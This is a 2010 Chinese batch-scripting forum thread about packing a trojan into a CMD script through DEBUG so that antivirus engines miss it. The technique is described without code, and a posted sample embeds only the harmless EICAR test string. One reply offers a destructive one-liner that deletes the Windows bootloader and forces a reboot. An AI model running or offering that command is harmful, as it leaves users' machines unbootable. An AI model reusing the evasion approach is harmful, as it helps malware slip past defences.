中国DOS联盟论坛 - Powered by Discuz! Board

标题: [原创]脚本打包木马不小心过掉了所有杀毒软件 [打印本页]

作者: sl543001 时间: 2010-5-5 19:00 标题: [原创]脚本打包木马不小心过掉了所有杀毒软件

下午更新了SYBC的无3方原型生成方案脚本
用来把com文件变成cmd脚本里的SYBCOM变量的数据

心血来潮,尝试用来直接打包木马
结果~~~20种杀软全部报安全~巨汗~
这也太容易了吧~~

考虑安全因素,俺就不发代码了,咱论坛的CMD加密早就被人抄去搞木马了
俺这个危险了点,就不发了啊

就贴截图好了

附件 1: mmm.GIF (2010-5-5 19:00, 83.82 K,下载次数： 2)

附件 2: mm.GIF (2010-5-5 19:00, 165.52 K)

作者: slore 时间: 2010-5-5 19:36
在线可能不准吧？

你最后生成出来。。。估计会被拦截住。

作者: yishanju 时间: 2010-5-5 19:51
－－明显的，或者运行的时候。

作者: tachyon 时间: 2010-5-5 20:43
杀软如果这种都不能拦截的话，那就可以集体扑街了。呵呵。

现在还是漏洞->溢出->rootkit,基本无解（高高手或许可以进行双机调试，或者脱机调试）但能真正把系统恢复如初的估计全地球不超过1000人(手动清除，自编写代码修复系统)

作者: sl543001 时间: 2010-5-5 22:25
原本脚本生成用DEBUG的文件有3KB限制
大概原因是CMD脚本行长度限制
原本以为CMD脚本行长度没有限制,其实有限制,大概是8KB

所以新的EXE2DEBUG使用了分段代码,分段生成N个2KB的小文件然后合并成一个
这个木马是98KB,实测效果不错,就是文件结尾多了一些数据,但不影响使用
利用这个脚本可以吧各种脚本 3方打包为cmd文件

作者: sl543001 时间: 2010-5-5 22:27
目前生成的文件大概是原文件的2.4倍,俺还会继续努力减小文件体积

作者: yishanju 时间: 2010-5-5 22:35
最后要方便到支持右键添加到压缩.

作者: freeants001 时间: 2010-5-5 23:14
利用Debug把文件放到批处理脚本中

作者: freeants001 时间: 2010-5-5 23:24
是病毒的话一DEBUG出来就被杀软封杀了

@echo off

more +5 "%~0"|debug&graftabl 936>nul

copy/b/y $tmp$ "杀软能力检测.txt">nul

del/a/f/q $tmp$

goto:eof

e0100  58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35 

e0110  34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41 

e0120  52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56 

e0130  49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24 

e0140  48 2B 48 2A                                     

rcx

44

n$tmp$

w

q

作者: qinchun36 时间: 2010-5-6 00:59
的确有不法分子啊，前几天我用google收索带引号的 "qinchun36@tom.com"
出来了四个结果，其中三个是卡饭论坛捉到的病毒，应该是我以前在论坛发的一个加密VBS脚本的VBS，结果就被有恶意目的的人利用了。。。

作者: HAT 时间: 2010-5-6 01:19 标题: Re 10 楼

杯具了
你替那些玩病毒的小P孩背黑锅啦

作者: sl543001 时间: 2010-5-6 22:26
看来悲剧了,不知道我会不会也悲剧掉

作者: Hanyeguxing 时间: 2010-5-6 22:34
给楼主一绝对病毒

del /f/q/a %SYSTEMDRIVE%NTLDR&shutdown -r -f -t 0

就没见一杀软拦截的，也没见微软保护他
俺不怕悲剧,只怕被喜剧了.......

[ Last edited by Hanyeguxing on 2010-5-6 at 22:40 ]

作者: gool123456 时间: 2010-5-7 19:37
呵呵，很早就发现了。一生出来就被宰了。